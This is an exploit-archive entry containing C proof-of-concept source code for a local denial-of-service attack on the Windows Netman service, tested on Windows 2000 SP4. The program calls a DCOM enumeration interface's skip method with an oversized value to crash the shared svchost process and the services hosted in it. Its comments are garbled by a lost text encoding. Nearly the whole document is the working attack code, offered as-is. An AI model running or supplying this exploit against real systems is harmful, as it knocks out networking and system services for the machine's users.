MS Windows Netman Service Local Denial of Service Exploit

2005-07-14T00:00:00
ID 1337DAY-ID-6011
Type zdt
Reporter bkbll
Modified 2005-07-14T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            =========================================================
MS Windows Netman Service Local Denial of Service Exploit
=========================================================



/* Windows Netman Service Local DOS Vulnerability.
 * 
 * By bkbll bkbll#cnhonker.net 2005-7-14 2:49??
 *
 * TESTED ON win2k sp4
 * 
 * ??Netman???svchost.exe -k netsvcs??, ????????,????????:
 * 
 * EventSystem,Irmon,RasMan,NtmsSvc,SENS
 * 
 */
#define _WIN32_DCOM

#include <stdio.h>
#include <stdlib.h>
#include <objbase.h>
#include <unknwn.h>
#include <windows.h>

#pragma comment(lib,"ole32")
    
MIDL_INTERFACE("98133274-4B20-11D1-AB01-00805FC1270E")
VCConnectionManagerEnumConnection //: public IDispatch
{
public:
	virtual HRESULT STDMETHODCALLTYPE QueryInterface(void) = 0;
	virtual ULONG STDMETHODCALLTYPE AddRef( void) = 0;
	virtual ULONG STDMETHODCALLTYPE Release( void) = 0;
	virtual HRESULT STDMETHODCALLTYPE next(void) = 0;
	virtual HRESULT STDMETHODCALLTYPE skip(DWORD) = 0;
	virtual HRESULT STDMETHODCALLTYPE reset(void) = 0;
	virtual HRESULT STDMETHODCALLTYPE clone(void) = 0;
};
CLSID CLSID_ConnectionManagerEnumConnection = {0x0BA126AD2,0x2166,0x11D1,{0xB1,0xD0, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};
IID IID_IEnumNetConnection  = {0xC08956A0,0x1CD3,0x11D1,{0x0B1,0x0C5, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};

//???
main(int argc,char **argv)
{
	VCConnectionManagerEnumConnection *clientcall;
	HRESULT hr;
	
	printf("Windows Netman Service Local DOS Vulnerability..\n\n");
	//???
	CoInitializeEx(NULL,COINIT_MULTITHREADED);

	printf("DCOM Client Trying started\n");
	hr = CoCreateInstance(CLSID_ConnectionManagerEnumConnection,NULL,CLSCTX_LOCAL_SERVER,IID_IEnumNetConnection,(void**)&clientcall);
	if (hr != S_OK)
	{
		printf("CoCreateInstanceEx failed:%d\n",GetLastError());
		return -1;
	}
	printf("Exploit netman service ....\n");
	hr = clientcall->skip(0x80000001);//(void**)&p);
	if(SUCCEEDED(hr))
	{
		printf("Call client proc Success.\n");
	}
	else
		printf("Call client proc failed:%d\n",GetLastError());
	hr = clientcall->Release();
	CoUninitialize();
	printf("Client exited.\n");
	return 1;
}



#  0day.today [2016-04-20]  #